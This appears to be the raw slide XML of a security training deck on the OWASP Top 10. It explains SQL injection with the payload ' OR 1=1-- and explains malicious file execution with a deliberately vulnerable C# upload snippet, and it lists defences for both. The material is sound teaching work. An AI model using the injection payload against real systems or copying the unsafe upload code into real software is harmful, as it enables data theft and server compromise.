              <a:gd name="T3" fmla="*/ 1657494 h 1633"/>
              <a:gd name="T4" fmla="*/ 658813 w 876"/>
              <a:gd name="T5" fmla="*/ 1869653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7684" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="576263" y="2355850"/>
            <a:ext cx="1260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APPLICATION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br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ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27685" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-129381" y="4866482"/>
            <a:ext cx="10556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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27686" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-223044" y="2108994"/>
            <a:ext cx="1246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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27687" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="1674019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Accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27688" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="1857375" y="20431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Finance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27689" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2053432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Administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27690" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2232025" y="20431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Transactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27691" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2428082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Communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27692" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2604294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Knowledge Mgmt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27693" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2788444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E-Commerce</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27694" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="2974182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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bus. Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1981200"/>
            <a:ext cx="838200" cy="950913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFFF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 Narrow" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a: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2819400" y="1944688"/>
            <a:ext cx="838200" cy="950912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFFF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 Narrow" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SQL query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="1868488"/>
            <a:ext cx="838200" cy="950912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFFF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 Narrow" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>DB Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Webdings" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="1905000"/>
            <a:ext cx="838200" cy="950913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFFF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Arial Narrow" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HTTP response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Webdings" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6345238" y="1219200"/>
            <a:ext cx="2422525" cy="1146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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM accounts WHERE acct=‘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’ OR 1=1--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="28194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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. Application presents a form to the attacker all via SSL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="35814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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. Attacker sends an attack in the form data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text Box 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="41148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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. Application forwards attack to the database in a SQL query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1371600"/>
            <a:ext cx="2963863" cy="137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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Account Summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acct:5424-6066-2134-4334</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acct:4128-7574-3921-0192</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acct:5424-9383-2039-4029</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acct:4128-0004-1234-0293</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text Box 57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="48768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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. Database runs query containing attack and sends encrypted results back to application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="58674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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5. Application decrypts data as normal and sends results to the user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248400" y="1219200"/>
            <a:ext cx="2613025" cy="1287463"/>
            <a:chOff x="5424" y="3360"/>
            <a:chExt cx="1646" cy="811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27714" name="Picture 6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24" y="3360"/>
              <a:ext cx="1646" cy="8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7715" name="Text Box 61"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5483" y="3504"/>
              <a:ext cx="501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sz="1200">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Account: </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27716" name="Text Box 62"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5472" y="3678"/>
              <a:ext cx="508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sz="1200">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       SKU: 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5940425" y="1219200"/>
            <a:ext cx="2876550" cy="1463675"/>
            <a:chOff x="5184" y="2448"/>
            <a:chExt cx="1570" cy="922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27711" name="Picture 6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84" y="2448"/>
              <a:ext cx="1570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7712" name="Text Box 65"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5204" y="2605"/>
              <a:ext cx="501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sz="1200">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Account: </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27713" name="Text Box 66"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5193" y="2779"/>
              <a:ext cx="508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sz="1200">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       SKU: </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27708" name="TextBox 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="495300" y="6248400"/>
            <a:ext cx="552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F6600"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>www.aspectsecurity.com/documents/Aspect_OWASP_Top_10_Part_1.ppt - Similar pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27709" name="Slide Number Placeholder 9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8DB003-BD71-45DC-8E26-68CD124BC5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671 C -0.00191 0.04445 -0.00851 0.2375 0.00885 0.30093 C 0.02622 0.36435 0.06892 0.37153 0.10035 0.37431 C 0.13177 0.37709 0.17899 0.38218 0.19705 0.31783 C 0.21493 0.25347 0.20694 0.04259 0.20885 -0.0125 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="17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" y="19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486 C 0.00086 0.04583 -0.00799 0.23773 0.00885 0.30092 C 0.02569 0.36412 0.06892 0.37153 0.10034 0.3743 C 0.13177 0.37708 0.17899 0.38217 0.19705 0.31782 C 0.2151 0.25347 0.20711 0.04259 0.20902 -0.0125 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="42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625 C 0.00225 0.05532 0.02031 0.23564 0.00885 0.30092 C -0.00261 0.3662 -0.03611 0.39236 -0.06789 0.39722 C -0.09966 0.40208 -0.16007 0.39444 -0.18143 0.32963 C -0.20278 0.26481 -0.19341 0.06203 -0.19584 0.00856 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="61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847 C -0.00104 0.07407 0.01962 0.23958 0.00885 0.30092 C -0.00191 0.36227 -0.03611 0.39236 -0.06788 0.39722 C -0.09965 0.40208 -0.16007 0.39444 -0.18142 0.32963 C -0.20278 0.26481 -0.1934 0.06203 -0.19583 0.00856 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="78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8" grpId="0" animBg="1"/>
      <p:bldP spid="78" grpId="1" animBg="1"/>
      <p:bldP spid="80" grpId="0"/>
      <p:bldP spid="81" grpId="0"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="83" grpId="0"/>
      <p:bldP spid="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Least privilege user accounts are to be created in SQL database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client and server side input validation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proper encoding and escaping mechanisms for inputs provided by database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Oracle – DBMS_ASSERT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Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0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MSSQL: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public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SqlSQuote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(string value)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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>return “’” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>value.Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(“’”, “’’”) + “’”;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}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481138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CWE-89: Failure to Preserve SQL Query Structure (aka 'SQL Injection’) - Protection</a:t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12287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400" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition: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Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise.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Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.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A3.	Malicious File Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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B11938-1295-4372-A713-6DD146EC339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408630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Applications which allow the user to provide a filename, or part of a filename are often vulnerable if input is not carefully validated.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Allowing the attacker to manipulate the filename may cause application to execute a system program or external URL.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Applications which allow file uploads have additional risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Place executable code into the application.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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800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A3.	Malicious File Execution</a:t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09B379-0332-4B58-8A63-6C7937FF108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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1377932"/>
            <a:ext cx="9144001" cy="548006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//html file upload control with id= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileMyFile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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>HttpPostedFile myFile = fil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>MyFile.PostedFile;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/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2300" dirty="0" smtClean="0"/>
              <a:t>byte[] myData = new byte[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>myFile.ContentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2300" dirty="0" smtClean="0"/>
              <a:t>];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//Read  data from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filestream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myFile.InputStream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>FileStream newFile = new FileStream(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, FileMode.Create);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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Write data to the file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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>newFile.Write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>.Length);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newFile.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="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What if: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\someFile.aspx”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9144001" cy="137793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C# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ASP.Net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Example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13AF09-63BE-4C48-A7A3-BBE651A769A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ontent Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1020766"/>
            <a:ext cx="9144000" cy="5408630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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Do not allow user input to be used for any part of a file or path name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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Where user input must influence a file name or URL, use a fully enumerated list to positively validate the value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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File uploads have to be done VERY carefully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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Only allow uploads to a path outside of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>webroot</a:t>
            </a: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 so it can not be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
